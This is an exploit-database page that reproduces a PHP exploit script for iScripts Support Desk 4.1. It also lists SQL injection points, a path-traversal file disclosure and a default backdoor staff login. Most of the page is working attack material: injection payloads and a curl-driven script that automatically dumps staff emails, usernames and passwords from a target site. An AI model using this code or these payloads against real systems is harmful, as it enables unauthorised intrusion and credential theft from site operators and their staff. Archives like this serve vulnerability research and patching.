Vulners
Lucene search
iScripts Support Desk 4.1 SQL Injection
`<?
/*
[+] iScripts Support desk version 4.1
[+] Sql Injection Exploit
[+] Vuln & Exploit By i-Hmx
[+] sec4ever.com , 1337s.cc
I.Sql Injection vulns
> Normal Sql
postticketbeforeregistersave.php
Staff table
post : txtname=faris&[email protected]&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN
Get staff
Post : txtname=faris&[email protected]&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(sptbl_staffs.vMail as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vLogin as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vPassword as char))),0x27,0x7e) from sptbl_staffs limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN
> Blind
/onlinetest.php
$comp = $_GET["comp"];
include("./config/settings.php");
include("./includes/functions/dbfunctions.php");
$conn = getConnection();
$sql_img = "select vChatIcon from sptbl_companies where nCompId='".$comp."'";
$res_img = executeSelect($sql_img,$conn);
if ( mysql_num_rows($res_img) > 0 ) {
Exploit : /onlinetest.php?id=1
/client_prechat.php
Line 3 : if ($_POST["comp"] !='' ) $comp = $_POST["comp"];
Line 245 :
$sql_dpt = "SELECT d.nDeptId, d.vDeptDesc FROM sptbl_depts d INNER JOIN sptbl_companies c
ON ( d.nCompId = c.nCompId ) WHERE d.nCompId = '".$comp."' ORDER BY d.vDeptDesc";
$res_dpt = executeSelect($sql_dpt,$conn);
Exploit as : site.com/supportdesk/client_prechat.php
Post parameter : comp=%inject_here%
/getChatIcon_det.php
Line 2 : $comp = $_GET["comp"];
Line 39 :
$sql = "select s.nStaffId from sptbl_staffs s inner join sptbl_staffdept sd on ( s.nStaffId = sd.nStaffId ) inner join sptbl_depts d on ( sd.nDeptId = d.nDeptId ) where s.vOnline='1' and s.vDelStatus='0' and d.nCompId='".$comp."'";
$result = executeSelect($sql,$conn);
if ( mysql_num_rows($result) > 0 ) {
$img_src = "images/chat/chat-icon-".$img_id."-online.gif";
} else {
$img_src = "images/chat/chat-icon-".$img_id."-offline.gif";
}
Exploit as : site.com/supportdesk/getChatIcon_det.php?comp=1
/getChatUpdates.php
if ( $_SESSION['sess_userid'] == "" ) echo "##X";
//So to Exploit it u should be logged in as normal user
else {
$mod = isset( $_GET['mod']) ? $_GET['mod'] : '' ;
$chatid = isset( $_GET['chatid']) ? $_GET['chatid'] : '' ;
$conn = getConnection();
$sql = "Select tMatter from sptbl_chat where nChatId='".$chatid."'";
$result = executeSelect($sql,$conn);
$rowcnt_chatUpd = mysql_num_rows($result);
Exploit : Login then Inject here > site.com/supportdesk/getChatUpdates.php?comp=1
You'd better use ur session id at havij for injection
II.Local File Disclosure
admin/csvdownload.php
$filename="../csvfiles/".addslashes($_GET["id"]);
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($filename));
header('Content-Disposition: attachment; filename=' . basename($filename));
readfile($filename);
Exploit as : admin/csvdownload.php?id=../config/settings.php
III.PHP Info disclosure
/phpinfo.php
IV.Back Door user
don't know if the nulled version only is backdoored or all versions
but backdoor staff member is installed as
user : staff
pass : staff
*/
if(!$argv[1])
{
echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/support/\n";
exit();
}
echo "[+] iScripts Support Desk Sql Injection Exploit \n";
echo "[-] Exploited By i-Hmx \n";
echo "[-] sec4ever.com , 1337s.cc\n";
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
function faexploit($url,$inj){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url."postticketbeforeregistersave.php");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl, CURLOPT_POSTFIELDS,$inj);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
$version=faexploit($argv[1],"txtname=faris&[email protected]&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select concat(0x66617273617779,0x3e3e,unhex(Hex(cast(version() as char))),0x3c3c)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN");
if(preg_match("/farsawy/",$version))
{
$ver=kastr($version,">>","<<");
echo "[-] Mysql Version : $ver\n";
$tbl=faexploit($argv[1],"txtname=faris&[email protected]&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x3e3e,unhex(Hex(cast(table_name as char))),0x3c3c) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN");
$stf=kastr($tbl,">>","<<");
echo "[-] Staffs table name : $stf\n";
$numb=faexploit($argv[1],"txtname=faris&[email protected]&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,count(*),0x3c3c) from sptbl_staffs)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN");
$num=kastr($numb,">>","<<");
echo "[-] Number of staff members : $num\n";
echo "[-] Staffs data ordered as : Email : Username: Password\n";
for($f=0;$f<$num;$f++)
{
$data=faexploit($argv[1],"txtname=faris&[email protected]&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x3e3e,unhex(Hex(cast(vMail as char))),0x3a,unhex(Hex(cast(vLogin as char))),0x3a,unhex(Hex(cast(vPassword as char))),0x3c3c) from $stf limit $f,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S¬login=NOTLOGIN");
$ok=kastr($data,">>","<<");
echo " $ok\n";
}
echo "[+] Done\n";
exit(" Greets From Faris ;)");
}
else
{
echo "[-] Target Not vulnerable\n";
echo "[+] Exit\n";
exit();
}
// 07/2011
// i-Hmx
?>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Dec 2013 00:00Current
0.1Low risk
Vulners AI Score0.1